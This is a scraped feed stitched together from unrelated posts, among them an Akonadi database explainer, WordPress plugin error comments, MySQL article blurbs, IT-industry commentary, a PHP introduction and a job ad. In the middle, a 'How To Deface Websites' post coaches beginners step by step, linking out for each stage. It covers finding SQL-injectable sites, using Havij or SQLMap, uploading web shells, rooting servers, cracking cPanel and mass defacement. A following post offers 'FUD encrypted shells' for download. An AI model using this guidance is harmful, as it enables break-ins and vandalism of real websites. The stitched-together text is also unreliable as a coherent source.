Akonadi misconception #1: where is my data?        


I regularly see the same misconception and fear popping up on the mailing lists, in bug reports and on IRC: if the Akonadi database gets corrupted, I will lose my data.

To make it clear from the beginning: the Akonadi database is NOT your MAIN data storage.
Even if it gets destroyed or removed, your data is still safe.

So what is the database?

1) It is an interface: the Akonadi server and the underlying database are a common interface to your (PIM-like) data for different applications, so those applications do not have to deal with the data files directly.

2) But I see my email headers and even bodies in the database and in $HOME/.local/share/akonadi/file_db_data. Why? Because the database is also a cache for your data. Common, frequently accessed parts (like e-mail headers) are stored in the database. These are usually stored permanently and kept in sync with your original data source (IMAP folders, mails on the local disk).
Parts requested infrequently are stored either in the database or in the above folder; the actual place depends on the size of the data. These parts are cleaned out of the cache from time to time if they have not been used for a certain period. Technically it is possible to configure when the cache is cleaned, or whether it is cleaned at all, but the regular user should not have to deal with that.

3) Is there anything I might lose by deleting the database? Yes, there is: the metadata added to your data. That can be any extra information that cannot be stored in the format of your data, like Nepomuk tags or other custom information. In the case of emails, you might think that read/forwarded/etc. flags can be lost. Luckily this is not the case (since KDE 4.7.2), as the email storage formats can store this information natively.

The above explains why you will not lose any critical information by losing your Akonadi database.

Good, but where is my data if not in the database? This depends on what kind of data we are talking about.

1) E-mail: in the case of IMAP (online or disconnected), your data is on the IMAP server. With disconnected IMAP there are windows when your local cache contains data that is not yet synchronized to the server; deleting the local cache at such a moment will indeed make you lose the unsynchronized mails. This is not Akonadi-specific, though; it is true for any disconnected IMAP client.
In the case of POP3, mails are stored immediately after download in a local maildir folder. The actual place of the folder depends on your configuration; it can be $HOME/Mail, $HOME/.kde/share/apps/kmail/ or $HOME/.local/share/.local-mail (for new installations).

2) Calendars and contact information: they can either be on a server (Kolab server, LDAP server) and only cached in Akonadi as explained, or they can be in local vCard or .ics files. The actual location of these files again depends on your setup. The new standard place for them is $HOME/.local/share/contacts.

Still, there have been reports of data loss. Why? Unfortunately programmers are not perfect and introduce bugs into the codebase. One of the most severe bugs caused real data loss when copying mails from one folder to another. This is fixed with KDE 4.7.2+ and any recent Akonadi server. There are other bugs around, but none will cause the loss of your original data files.

Finally, what happens if the database gets corrupted? Of course, it needs to be recreated. You can try this by shutting down the Akonadi server (akonadictl stop), removing $HOME/.local/share/akonadi and synchronizing all your resources again (this will take some time). If the database is not recreated, you need to do a full cleanup by also removing the configuration files under $HOME/.config/akonadi.
Then you need to add back your resources (IMAP/POP3/contact files/etc.) and synchronize them. In the case of emails, check your filters afterwards; they will most probably try to move mails into a wrong folder.
Yes, this is a lot of work and should be avoided as much as possible, but it should only be needed in the rare case of real database corruption.
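The recreation procedure just described can be sketched as a few shell commands. This is only an illustration of the steps above, with a guard so it does nothing on systems without Akonadi; remember that removing the cache is destructive (it wipes the local Akonadi cache, not your mail files), so read before you run:

```shell
# Paths named in the post
AKONADI_DATA="$HOME/.local/share/akonadi"
AKONADI_CONFIG="$HOME/.config/akonadi"

if command -v akonadictl >/dev/null 2>&1; then
    akonadictl stop
    rm -rf "$AKONADI_DATA"
    # Full cleanup, only if the database does not get recreated:
    # rm -rf "$AKONADI_CONFIG"
    akonadictl start   # resources will now re-synchronize (this takes a while)
else
    echo "akonadictl not found - nothing done"
fi
```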

I hope this will clear some confusion about the data storage inside Akonadi.

And a few words about the database itself.
We use MySQL. I don't know the original reason why it was picked (ask Volker about that ;) ), but I know some people don't like it for whatever reason.
Most of them try to use SQLite. A friendly warning: don't. This is also explained in the Akonadi wiki. Everything written there is true, and I have experienced it myself as well.
Unfortunately I recently learned that MySQL has some severe issues in certain cases: NFS-mounted home directories and failed suspend/resume. In these cases the database gets corrupted (this is a MySQL bug!) and cannot be easily restored. I did not experience this corruption myself, but it has been reported from time to time.
What remains is trying another database server, namely PostgreSQL. Akonadi supports it; it is possible to change the database backend in akonaditray or in the akonadiconsole application. Changing backends means importing all your data into the database again, as if you were starting from scratch. PostgreSQL support is not that well tested, so expect some rough edges, but we would like to see people try it out and report their experience with it.
It is my personal opinion only, but if PostgreSQL proves to work fine, we might switch to it as the default backend, given the problems with MySQL.
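For the curious: the selected backend ends up in Akonadi's server configuration file. The sketch below shows what the PostgreSQL setting might look like; the file location and key name are from my memory of the Qt driver naming, so treat them as assumptions and prefer switching via akonaditray or akonadiconsole as described above:

```ini
# $HOME/.config/akonadi/akonadiserverrc  (assumed path and key name; verify locally)
[General]
Driver=QPSQL
```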

What about other database backends? There were plans to use Virtuoso, to reduce the number of database servers needed for a KDE desktop, but the work was not completed. See the TechBase article.

UPDATE: Christophe Giboudeaux raised a point about PostgreSQL: its database format changes between major releases in an incompatible way, and there is no automated, easy way to upgrade (you need to dump with the old version and import with the new one). Sad that there is no perfect solution.

          How To Deface Websites?        

Everyone who is new to hacking wants to learn the same things first: how to deface a website, root the server, or crack the cPanels of a website. In this post I will be telling you how hackers manage to break into a website: deface it, symlink it, root the server and so on.

So let's start.

SQL Injection

SQL Injection is one of the most widely and commonly used methods for hacking and breaking into websites. SQL injection attacks can be performed manually as well as with automated tools. You can find SQL-vulnerable sites from here

For Automated SQL Injection
SQL Injection using Havij Automated Tool
SQL Injection through SQL Map
SQL Injection with your Android Phone

Download Havij Pro version from here

For Manual SQL Injection
Manual SQL Injection
MySQL Injection
Hack Admin Panel of a Website with SQL Injection

Hacking a Website on a Shared Server
Suppose there is a website hosted on a shared server with a given IP address, and you want to shell that server in order to access a particular site and deface it.
To accomplish this task you can use Bing. Learn it from here

Broke into the admin panel? Confused about what to do now?
You are finally inside the administrator panel of the website. Your next task is to upload a shell. For that, find an upload form and shell it with Live HTTP Headers; learn this from here.
Sometimes server security is tight, so it is difficult to get your shell executed. If you face a similar kind of problem, here is the solution.

To upload your shell on Joomla refer to the post -> How to Upload Your Shell on Joomla
For Wordpress go here -> Upload Your Shell on Wordpress

Learn hacking wordpress and joomla sites from here

You have got your shell up on the server. Now you can simply deface it, root the server, mass deface it, or symlink it.

How to root a server
How to crack cPanel
How to mass deface
Mass defacing script
How to Symlink

Got doubts? Comment below and get your query solved.

           New And Latest FUD Encrypted Shells Collection 2013        


Interface Of Shells 


Download Link :- Link 1 

Comment on Docs & Demo by b.a.
The plugin never uses this function. Try a Google search for "Fatal error: Uncaught Error: Call to undefined function mysql_get_server_info()"; maybe someone has had the same problem.
Comment on Docs & Demo by Thomas
Even if I deactivate all plugins, the same alert still remains. Here's the complete alert (I've just replaced account and domain infos with "..."): "Fatal error: Uncaught Error: Call to undefined function mysql_get_server_info() in /www/htdocs/...../wp-content/plugins/google-maps-gpx-viewer/php/gpx_database.php:191 Stack trace: #0 /www/htdocs/...../wp-content/plugins/google-maps-gpx-viewer/php/gpx_database.php(12): poi_db_install() #1 /www/htdocs/...../wp-content/plugins/google-maps-gpx-viewer/php/map_functions.php(17): require_once('/www/htdocs/w01...') #2 /www/htdocs/..../plugins/google-maps-gpx-viewer/google-maps-gpx-viewer.php(17): require('/www/htdocs/w01...') #3 /www/htdocs/....../includes/plugin.php(1882): include('/www/htdocs/w01...') #4 /www/htdocs/..../wp-admin/plugins.php(164): plugin_sandbox_scrape('google-maps-gpx...') #5 {main} thrown in /www/htdocs/....../wp-content/plugins/google-maps-gpx-viewer/php/gpx_database.php on line 191"
Comment on Docs & Demo by Thomas
Hi, your plugin looks really great, and if it worked I would also donate. Unfortunately I get a fatal error when I try to activate the plugin: "Fatal error: Uncaught Error: Call to undefined function mysql_get_server_info()". Wordpress version: 4.7.3, PHP version: 5.6.29, MySQL version: 5.7.15. Do you know any solution?
Comment on Docs & Demo by b.a.
In gpx_database.php search for: mysql_get_client_info and replace with: mysqli_get_client_info. Save the change and then retry.
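The search-and-replace above can also be done from the command line. A hedged sketch covering both function names mentioned in this thread (`mysql_get_server_info` and `mysql_get_client_info`); note that a blind rename assumes the call sites already pass a connection handle, since the `mysqli_*` variants require one:

```shell
# Replace the removed mysql_* info calls with their mysqli_* equivalents,
# keeping a .bak backup of the edited file.
fix_gpx_db() {
    sed -i.bak \
        -e 's/mysql_get_server_info/mysqli_get_server_info/g' \
        -e 's/mysql_get_client_info/mysqli_get_client_info/g' \
        "$1"
}
# Usage, from the plugin's php/ directory:
# fix_gpx_db gpx_database.php
```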
          Kommentar zu Docs & Demo von Jo Swan        
Hi, I've downloaded the plugin but upon activation (activate plugin) i get the following error: Fatal error: Call to undefined function mysql_get_server_info() in D:\xampp\htdocs\Green\wp-content\plugins\google-maps-gpx-viewer\php\gpx_database.php on line 191 Can this be resolved? What am I to do next? Any suggestions? Wordpress is up to date... (WordPress 4.5.3) Thanks,
          Migration (almost) complete        

This weekend has seen a complete migration of An Architect's View from a very old version of BlogCFC (3.5.2) with a custom Fusebox 4.1 skin to the latest Mango Blog (1.4.3) as well as a complete migration of all of the content of the non-blog portion of corfield.org (my personal stuff, my C++ stuff and a bunch of stuff about CFML, Fusebox and Mach-II) from Fusebox to FW/1. I've moved from a VPS on HostMySite to an "enterprise cloud server" at EdgeWebHosting and I think it's all gone pretty smoothly although it's been a lot of work.

Hopefully I haven't broken too many URLs - I spent quite a bit of time working on Apache RewriteRules to try to make sure old URLs still work - but it has given me the opportunity to streamline a lot of the files on the site (can you imagine how much cruft can build up in eight years of running a site?).

What's left? Just the "recommended reading" bookstore portion of my old site. I store the book details in an XML file and process them in a CFC as part of the old Fusebox app (converted from Mach-II before that and from PHP before that). It's late and I can't face it tonight. Then I need to build out a Mango skin that looks like my old site (and eventually re-skin the non-blog portion of the site).

The underpinnings of the site are Apache, Railo ( at the time of writing), Tomcat (6.0.26 at the time of writing), Red Hat Linux, MySQL. I still have some fine-tuning to do but this is pretty much an out-of-the-box WAR-based install of Railo on Tomcat for this one site on the server. Over time I'll probably build out a home for FW/1 here under another domain, with examples and more documentation than is currently maintained on the RIAForge wiki. That's the plan anyway.

If you find any broken links, let me know (the Contact Me! link is in the right hand column, near the bottom).

A Few Notes on MySQL Deadlocks and Logs

Recently our production MySQL suffered several data anomalies in a row, all erupting in the small hours. Since the business scenario is a typical data-warehouse application, daytime load is light and the problems could not be reproduced. Some of the anomalies were downright baffling, and the root cause analysis took considerable effort. So in real-world operations, how can we quickly pinpoint and fix MySQL problems in production? Below I will share the relevant experience and methods based on two actual cases.

"A Few Notes on MySQL Deadlocks and Logs" was first published on Jobbole (伯乐在线).

MySQL High-Performance Table Design Guidelines

Good logical and physical design is the cornerstone of high performance. The schema should be designed around the queries the system will actually run, which usually means weighing various trade-offs.

"MySQL High-Performance Table Design Guidelines" was first published on Jobbole (伯乐在线).

          Comment on Ruby, NewRelicRPM, Font-face, Redis, testing, etc. by andre        
I recommend the free MySQL manager Valentina Studio; check it out if you haven't tried it yet: http://www.valentina-db.com/valentina-studio-overvie
          [news] "2004 State of Application Development"        
Friday, August 13, 2004
Dateline: China
Special issues of journals and magazines are often quite good -- if you're into the subject matter.  But the current issue of VARBusiness is absolutely SUPERB!!  EVERY SYSTEMS INTEGRATOR SHOULD READ IT ASAP -- STOP WHAT YOU'RE DOING AND READ THIS ISSUE!!  (Or, at the very least, read the excerpts which follow.)  See http://tinyurl.com/6smzu .  They even have the survey results to 36 questions ranging from change in project scope to preferred verticals.  In this posting, I'm going to comment on excerpts from this issue.  My comments are in blue.  Bolded excerpted items are MY emphasis.
The lead article and cover story is titled, "The App-Dev Revolution."  "Of the solution providers we surveyed, 72 percent say they currently develop custom applications or tailor packaged software for their customers. Nearly half (45 percent) of their 2003 revenues came from these app-dev projects, and nearly two-thirds of them expect the app-dev portion of total revenue to increase during the next 12 months."  I view this as good news for China's SIs; from what I've observed, many SIs in China would be a good fit for SIs in the U.S. looking for partners to help lower their development costs.  "By necessity, today's solution providers are becoming nimbler in the software work they do, designing and developing targeted projects like those that solve regulatory compliance demands, such as HIPAA, or crafting wireless applications that let doctors and nurses stay connected while they roam hospital halls."  Have a niche; don't try to be everything to everyone.  "Nine in 10 of survey respondents said their average app-dev projects are completed in less than a year now, with the smallest companies (those with less than $1 million in revenue) finishing up in the quickest time, three months, on average."  Need for speed.  "The need to get the job done faster for quick ROI might explain the growing popularity of Microsoft's .Net framework and tools.  In our survey, 53 percent of VARs said they had developed a .Net application in the past 12 months, and 66 percent of them expect to do so in the coming 12 months."  My Microsoft build-to-their-stack strategy.  "Some of the hottest project areas they report this year include application integration, which 69 percent of VARs with between $10 million or more in revenue pinned as their busiest area.  Other top development projects center around e-commerce applications, CRM, business-intelligence solutions, enterprisewide portals and ERP, ..."  How many times have I said this?    
"At the same time, VARs in significant numbers are tapping open-source tools and exploiting Web services and XML to help cut down on expensive software-integration work; in effect, acknowledging that application development needs to be more cost-conscious and, thus, take advantage of open standards and reusable components.  Our survey found that 32 percent of VARs had developed applications on Linux in the past six months, while 46 percent of them said they plan to do so in the next six months.  The other open-source technologies they are using today run the gamut from databases and development tools to application servers."  I guess there's really an open source strategy.  I come down hard on open source for one simple reason:  I believe that SIs in China could get more sub-contracting business from a build-to-a-stack strategy.  And building to the open source stack isn't building to a stack at all!!  "As a business, it has many points of entry and areas of specialization.  Our survey participants first arrived in the world of app dev in a variety of ways, from bidding on app-dev projects (45 percent) to partnering with more experienced developers and VARs (28 percent) to hiring more development personnel (31 percent)."  For SIs in China, simply responding to end-user RFQs is kind of silly.  Better to partner on a sub-contracting basis.  "According to our State of Application Development survey, health care (36 percent), retail (31 percent) and manufacturing (30 percent) ranked as the most popular vertical industries for which respondents are building custom applications.  Broken down further, among VARs with less than $1 million in total sales, retail scored highest, while health care topped the list of midrange to large solution providers."  Because of regulatory issues, I'm not so keen on health care.  I'd go with manufacturing followed by retail.  My $ .02.  
"When it comes to partnering with the major platform vendors, Microsoft comes out the hands-on winner among ISVs and other development shops.  A whopping 76 percent of developers in our survey favored the Microsoft camp.  Their level of devotion was evenly divided among small, midsize and large VARs who partner with Microsoft to develop and deliver their application solutions.  By contrast, the next closest vendor is IBM, with whom one in four VARs said they partner.  Perhaps unsurprisingly, the IBM percentages were higher among the large VAR category (those with sales of $10 million or more), with 42 percent of their partners coming from that corporate demographic.  Only 16 percent of smaller VARs partner with IBM, according to the survey.  The same goes for Oracle: One-quarter of survey respondents reported partnering with the Redwood Shores, Calif.-based company, with 47 percent of them falling in the large VAR category.  On the deployment side, half of the developers surveyed picked Windows Server 2003/.Net as the primary platform to deliver their applications, while IBM's WebSphere application server was the choice for 7 percent of respondents.  BEA's WebLogic grabbed 4 percent, and Oracle's 9i application server 3 percent of those VARs who said they use these app servers as their primary deployment vehicle."  Microsoft, Microsoft, Microsoft.  Need I say more?  See http://tinyurl.com/45z94 .
The next article is on open source.  "Want a world-class database with all the bells and whistles for a fraction of what IBM or Oracle want?  There's MySQL.  How about a compelling alternative to WebSphere or WebLogic?  Think JBoss.  These are, obviously, the best-known examples of the second generation of open-source software companies following in the footsteps of Apache, Linux and other software initiatives, but there are far more alternatives than these.  Consider Zope, a content-management system downloaded tens of thousands of times per month free of charge, according to Zope CEO Rob Page.  Some believe Zope and applications built with Zope are better than the commercial alternative they threaten to put out of business, Documentum.  Zope is also often used to help build additional open-source applications.  One such example is Plone, an open-source information-management system.  What began as a fledgling movement at the end of the past decade and later became known as building around the "LAMP stack" (LAMP is an acronym that stands for Linux, Apache, MySQL and PHP or Perl) has exploded to virtually all categories of software.  That includes security, where SpamAssassin is battling spam and Symantec, too.  Popular?  Well, it has now become an Apache Software Foundation official project.  The use of open source is so widespread that the percentage of solution providers who say they partner with MySQL nearly equals the percentage who say they partner with Oracle: 23 percent to 25 percent, respectively.  There are plenty of choices for those SIs willing to play the open source game.  See http://tinyurl.com/4e3c7 .
"It's all about integration" follows.  "There are many reasons for the surge in application-development projects (the recent slowdown in software spending notwithstanding).  For one, many projects that were put on hold when the downturn hit a few years ago are now back in play.  That includes enterprise-portal projects, supply-chain automation efforts, various e-commerce endeavors and the integration of disparate business systems."  Choose carefully, however.  Balance this data with other data.  Right now, I see a lot more play with portals and EAI.  "Indeed, the need for quality and timely information is a key driver of investments in application-integration initiatives and the implementation of database and business-intelligence software and portals.  A healthy majority of solution providers say application integration is a key component of the IT solutions they are deploying for customers.  According to our application-development survey, 60 percent say their projects involved integrating disparate applications and systems during the past 12 months."  "Some customers are moving beyond enterprise-application integration to more standards-based services-oriented architectures (SOAs).  SOAs are a key building block that CIOs are looking to build across their enterprises."  Anyone who regularly reads any one of my three IT-related blogs knows that I'm gung-ho on SOAs.  "Even if your customers are not looking for an SOA, integrating different systems is clearly the order of the day.  To wit, even those partners that say enterprise portals or e-business applications account for the bulk of their business note that the integration component is key."  Yes, integration, integration, integration.  I'll be saying this next year, too.  And the year after ...  "Another way to stay on top of the competition is to participate in beta programs."  Absolutely true -- and a good strategy, too.  See http://tinyurl.com/6x2gg .
The next article is on utility computing versus packaged software.  Again, if you read what I write, you know that I'm also gung-ho on utility computing.  "According to VARBusiness' survey of application developers, more than 66 percent of the applications created currently reside with the customer, while 22 percent of applications deployed are hosted by the VAR.  And a little more than 12 percent of applications developed are being hosted by a third party.   Where services have made their biggest inroads as an alternative to software is in applications that help companies manage their customer and sales information."  The article goes on to state that apps that are not mission-critical have the best chance in the utility computing space.  Time will tell.  Take note, however, that these are often the apps that will most likely be outsourced to partners in China.  "Simply creating services from scratch and then shopping them around isn't the only way to break into this area.  NewView Consulting is expanding its services business by starting with the client and working backward.  The Porter, Ind.-based security consultant takes whatever technology clients have and develops services for them based on need."   And focus on services businesses and .NET, too.  "Most application developers agree that services revenue will continue to climb for the next year or two before they plateau, resulting in a 50-50 or 60-40 services-to-software mix for the typical developer.  The reason for this is that while applications such as CRM are ideally suited to services-based delivery, there are still plenty of other applications that companies would prefer to keep in-house and that are often dependent on the whims of a particular company."  Still, such a split shows a phenomenal rise in the importance of utility computing offerings.  See http://tinyurl.com/54blv .
Next up:  Microsoft wants you!!  (Replace the image of Uncle Sam with the image of Bill Gates!!)  Actually, the article isn't specifically about Microsoft.  "Microsoft is rounding up as many partners as it can and is bolstering them with support to increase software sales.  The attitude is: Here's our platform; go write and prosper.  IBM's strategy, meanwhile, is strikingly different.  While it, too, has created relationships with tens of thousands of ISVs over recent years,  IBM prefers to handpick a relatively select group, numbering approximately 1,000, and develop a hand-holding sales and marketing approach with them in a follow-through, go-to-market strategy."  Both are viable strategies, but NOT both at the same time!!  "To be sure, the results of VARBusiness' 2004 State of Application Development survey indicates that Microsoft's strategy makes it the No. 1 go-to platform vendor among the 472 application developers participating in the survey.  In fact, more than seven out of 10 (76 percent) said they were partnering with Microsoft to deliver custom applications for their clients.  That number is nearly three times the percentage of application developers (26 percent) who said they were working with IBM ..."  Percentages as follows:  Microsoft, 76%; IBM, 26%; Oracle, 25%; MySQL, 23%; Red Hat, 17%; Sun, 16%; Novell, 11%; BEA, 9%.  I said BOTH, NOT ALL.  Think Microsoft and IBM.  However, a Java strategy could be BOTH a Sun AND IBM strategy (and even a BEA strategy).  See http://tinyurl.com/68grf .
There was another article I liked called, "How to Team With A Vendor," although it's not part of the app-dev special section per se.  This posting is too long, so I'll either save it for later or now note that it has been urled.  See http://www.furl.net/item.jsp?id=680282 .  Also a kind of funny article on turning an Xbox into a Linux PC.  See http://tinyurl.com/4mhn6 .  See also http://www.xbox-linux.org .
Quick note:  I'll be in SH and HZ most of next week, so I may not publish again until the week of the 23rd.
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

How to Create a Database, Add a Site and an Additional Domain (Alias) on Your Hosting

Hello, dear readers of the Goldbusinessnet.com blog! Today we will take a detailed look at such operations in the hosting admin panel (what is that?) as creating a database, adding a new site, and adding additional domains (aliases).

These are the most common operations, carried out by users most frequently. As always, practice gives you the necessary skills, and over time you will perform such tasks on full autopilot, easily and effortlessly.

I want to note that I have been reviewing, and will continue to review, everything related to the hosting control panel using the example of my own provider, Sprinthost, since I have been using its services for quite a long time and know all the fine points well (how to buy hosting for a site on Sprinthost.ru).


          Retrieving Data From a MySQL Database        
In this article I am going to show you how to programmatically retrieve data from a MySQL database using the MySqlDataAdapter and the MySqlDataReader classes. Both these classes are available once you install the MySQL Connector for .NET which can be downloaded from here: MySQL Connectors. For this example we need a database with some […]
          Connecting to a MySQL Database Programmatically        
Microsoft Visual Studio lets you create a database connection using its IDE, and it’s quite powerful as well, but personally I prefer to create my database connections programmatically. When creating my connection’s code manually I find it easier to follow the code, plus it can be easier to debug as well. I am by no […]
          Partial Telecommute Automation Subject Matter Expert in the Walnut Creek Area        
A staffing and recruitment firm needs applicants for an opening for a Partial Telecommute Automation Subject Matter Expert in the Walnut Creek Area.

Candidates will be responsible for the following:
• Driving Enterprise Change Management and Configuration Management process improvement projects
• Applying deep expertise in delivering process automation and ServiceNow
• Programming automation of report and scorecard creation via integration of reporting tools, Remedy and ServiceNow

Skills and Requirements Include:
• Partial telecommute; must work some of the time at offices in Walnut Creek or Corona, CA
• Bachelor's Degree in CIS, Business Administration, or related field, or equivalent experience
• Minimum ten (10) years IT experience within a large matrixed organization
• Software Developer experience in: HTML, HTML5, CSS, CSS3, PHP, MySql, Ruby, etc
• Deep working knowledge of automation and reporting tools such as HPOO, IBM Rational, BluePrism, Tableau and others
• All other requirements listed by the company
Authentication in Web Applications (1): Basic Authentication (the BASIC authorization method)

In web application development of any scale, every developer runs into the problem of protecting application data, involving users' login IDs and passwords. So what is the best way to perform authentication? In practice there are many ways to do it. This article will not consider every authentication method; the goal is to show you the simplest and most convenient one. Below we discuss one of the basic approaches, the BASIC authorization method.


       CREATE TABLE users (
           id int(11) NOT NULL auto_increment,
           username varchar(20) NOT NULL,
           password varchar(20) NOT NULL,
           PRIMARY KEY (id)
       );

       CREATE TABLE roles (
           id int(11) NOT NULL auto_increment,
           rolename varchar(20) NOT NULL,
           PRIMARY KEY (id)
       );

       CREATE TABLE user_roles (
           id int(11) NOT NULL auto_increment,
           username varchar(20) NOT NULL,
           rolename varchar(20) NOT NULL,
           PRIMARY KEY (id)
       );

       INSERT INTO users(username, password) VALUES ('zhangdongyu', 'loveyuanyuan');
       INSERT INTO roles(rolename) VALUES ('manager');
       INSERT INTO user_roles(username, rolename) VALUES ('zhangdongyu', 'manager');
      <!-- In Tomcat's conf/server.xml, replace the default
           <Realm className="org.apache.catalina.realm.MemoryRealm" />
           with a JDBCRealm pointing at the tables above.
           (driverName was not in the original fragment and is assumed.) -->
      <Realm className="org.apache.catalina.realm.JDBCRealm"
             driverName="com.mysql.jdbc.Driver"
             connectionURL="jdbc:mysql://localhost/weblogin"
             connectionName="root"
             connectionPassword="123"
             userTable="users"
             userNameCol="username"
             userCredCol="password"
             userRoleTable="user_roles"
             roleNameCol="rolename" />
      <!-- connectionURL/connectionName/connectionPassword: database URL, user and
           password; userTable/userNameCol/userCredCol: user table and its
           username/password columns; userRoleTable/roleNameCol: user-role mapping
           table and its role column -->



  <!-- In web.xml: protect the application and require BASIC login.
       (url-pattern and role-name are reconstructed from the tables above;
       only web-resource-name and realm-name survived in the original fragment.) -->
  <security-constraint>
      <web-resource-collection>
          <web-resource-name>Web Demo</web-resource-name>
          <url-pattern>/*</url-pattern>
      </web-resource-collection>
      <auth-constraint>
          <role-name>manager</role-name>
      </auth-constraint>
  </security-constraint>
  <login-config>
      <auth-method>BASIC</auth-method>
      <realm-name>Web Demo</realm-name>
  </login-config>

A dialog box will pop up asking you to enter a username and password; you can only get in if you enter a username and password stored in the database and that user has the manager role.
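Under the hood, BASIC authentication simply base64-encodes "username:password" into the Authorization request header. A quick sketch with the demo user from the tables above (the curl URL is only a placeholder for wherever the demo app is deployed):

```shell
# HTTP Basic authentication sends:  Authorization: Basic base64(user:password)
creds=$(printf '%s' 'zhangdongyu:loveyuanyuan' | base64)
echo "Authorization: Basic $creds"

# The same header can be exercised against the protected app, e.g.:
# curl -u zhangdongyu:loveyuanyuan http://localhost:8080/yourapp/
```

Note that base64 is an encoding, not encryption, which is why BASIC auth should be combined with HTTPS in practice.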


Posted by 疯狂 on 2011-03-22 18:33

wpX, the WordPress-dedicated rental server: a MySQL capacity increase has been announced for all wpX Cloud plans and the wpX rental server. This is very welcome news. With the previous specs, the service felt rather overpriced relative to the MySQL capacity you got...
Survey Script

A few months ago I needed to run a survey. I also had a bit of free time, so I decided to sit down and write my own survey script. I am only now finding the chance to share it here. It is worth mentioning that I wrote it using PHP and a MySQL database. Let me briefly describe the script. At the same time, more than one...
Read more

• What PHP is

• How PHP relates to HTML

• Advantages of PHP

What PHP is
PHP is short for "PHP: Hypertext Preprocessor", a scripting language that
embeds into HTML. Most of its syntax resembles C, Java and Perl, plus a number
of PHP-specific functions. The main purpose of the language is to let web
designers write dynamic web pages quickly.

How PHP relates to HTML
A web page is usually built from HTML code stored in a file with the .html
extension. The server sends this HTML file to the browser, which then
interprets the code and renders the page. A PHP program works differently: it
must first be interpreted by the web server, which produces the HTML that is
sent to the browser for display. A PHP program can stand on its own or be
embedded between HTML code so that it is rendered together with that HTML.
PHP code is embedded by enclosing it between the <?php ... ?> tags, which are
usually described as tags for "escaping" from HTML code. An HTML file that has
had PHP code added to it must have its extension changed to .php3 or .php.

PHP is a server-side, HTML-embedded scripting language: the script sits inside
the HTML and lives on the server. This means the statements and commands we
write are executed entirely on the server but delivered alongside ordinary
HTML. PHP is known as a scripting language that integrates with HTML tags, is
executed on the server, and is used to build dynamic web pages, much like ASP
(Active Server Pages) and JSP (Java Server Pages).

PHP was first created by Rasmus Lerdorf, a C programmer. He initially used it
to count the visitors to his website. He then released Personal Home Page
Tools version 1.0 for free; this first version appeared in 1995 and consisted
of a collection of Perl scripts he had written to make his web pages dynamic.
In 1996 he released PHP version 2.0, which could already access databases and
integrate with HTML.

On 6 June 1998, PHP version 3.0 was released by Rasmus together with his
software development group.
The latest version, PHP 4.0, released on 22 May 2000, is more complete still
compared with its predecessors. The most fundamental change in PHP 4.0 is the
integrated Zend Engine, created by Zeev Suraski and Andi Gutmans as a
refinement of the PHP scripting engine. Another is built-in HTTP session
support, which no longer requires an extra library as earlier PHP versions
did. The goal of this scripting language is to build applications that run on
top of web technology. Such applications generally present their results in a
web browser, while the processing itself runs entirely on the web server.

Advantages of PHP
As e-commerce keeps growing, static sites are increasingly abandoned because
they are considered to no longer meet market demands, since sites need to
stay dynamic. Perl and CGI have fallen well behind the times, so most web
designers have moved to more dynamic server-side scripting languages such as
PHP.
Any web-based application can be built with PHP. PHP's greatest strength,
however, is its connectivity with database systems from within the web. The
database systems PHP supports include:

1. Oracle
2. MySQL
3. Sybase
4. PostgreSQL
5. and others

PHP runs on a variety of operating systems such as Windows 98/NT,
UNIX/Linux, Solaris and Macintosh.
          Business consulting in ICT        
Technology project development and management with 15 years of experience across several areas of specialization: management systems, methods, procedures and innovation in line with the ISO 9001, ISO 27001, ISO 20000, PMI, BS 25999, ITIL, CMMI, Scrum, COBIT, MAAGTIC-SI and TSP-PSP standards. Telecommunications projects for LAN and WAN links; administration of servers: Unix, Microsoft, Oracle, WebLogic, SQL, MySQL, etc. Software development: web and mobile APIs (Android, iOS), data center administration and ICT consulting services. Ask us how; we can advise you!
          At-home summer courses in Puebla        
At-home summer courses in Puebla. I offer at-home summer courses in Word, Excel, PowerPoint, HTML, PHP, MySQL and Dreamweaver at all three levels (basic, intermediate, advanced), as well as a course on computer repair and assembly... contact me
          CloudSQL for the busy Java Developer        
CloudSQL, Google’s fully-managed and highly-available MySQL-based relational database service, can be accessed directly by Java IDE’s or used as a target for on-premise running Java application servers, and of course it can be seamlessly used from AppEngine Java applications. Here’s how. Pre-requisites This paper assumes you have a CloudSQL database instance configured and (ideally) populated. You … Continue reading "CloudSQL for the busy Java Developer"
          djunjich wrote in the thread: outputting data from a MySQL DB with PHP        
          Kusss wrote in the thread: outputting data from a MySQL DB with PHP        
          djunjich wrote in the thread: outputting data from a MySQL DB with PHP        
Please help: how can I output data from MySQL as a table whose cells are Input fields, so the values can be edited and saved right there, i.e. like in an Excel spreadsheet?
Here is my code:

$link = mysqli_connect('localhost', "djunjich", '011168', 'dbip');
if ( !$link ) die("Error");
mysqli_query($link, "SET NAMES utf8");

$query = "select * from goroh";
$result = mysqli_query($link, $query);
if ( !$result ) echo "An error occurred: ".mysqli_error($link);
//else echo "Data received";

print '<table border="5" align="center" bgcolor="EEE8AA">';
//print '<table>'
//<link rel="stylesheet" href="css/style.css">

while($row = $result->fetch_object()) {
print '<tr>';
print '<td>'.$row->IP.'</td>';
print '<td>'.$row->Hostname.'</td>';
print '<td>'.$row->Location.'</td>';
print '<td>'.$row->MAC_Address.'</td>';
print '<td>'.$row->Notes.'</td>';
print '</tr>';
}
print '</table>';
// Frees the memory associated with a result
mysqli_free_result($result);


          Siberian.pro wrote in the thread: PHP developer.        
Salary information: 60,000-80,000

The Siberian.pro team is looking for a Middle/Senior-level PHP developer.
We help startups from all over the world bring their ideas to life.
Yes, we do outsourcing, but only for projects we enjoy building.

We are looking for someone who:
  • Is not afraid to take on new, non-standard problems;
  • Is skilled with PHP (Yii2|Symfony|Laravel), JavaScript (Client/Server), HTML, CSS, MySQL|PostgreSQL, Nginx, Git;
  • Knows, or wants to figure out, how high-load projects work;
  • Knows what Redis, RabbitMQ and Sphinx are, and may even have used them;
  • Can come into the office 2-3 times a week (very desirable, but not critical).

We offer:
  • Challenging, interesting work;
  • The option of working remotely from anywhere in the world, on a schedule that suits you;
  • Training within Academpark (attending IT conferences and events);
  • The chance to study and apply new technologies in practice and to exchange knowledge and experience;
  • A fun and friendly office in Academpark (Novosibirsk).
If the vacancy interests you, send your resume to: job@siberian.pro



DbFit: Test-driven database development


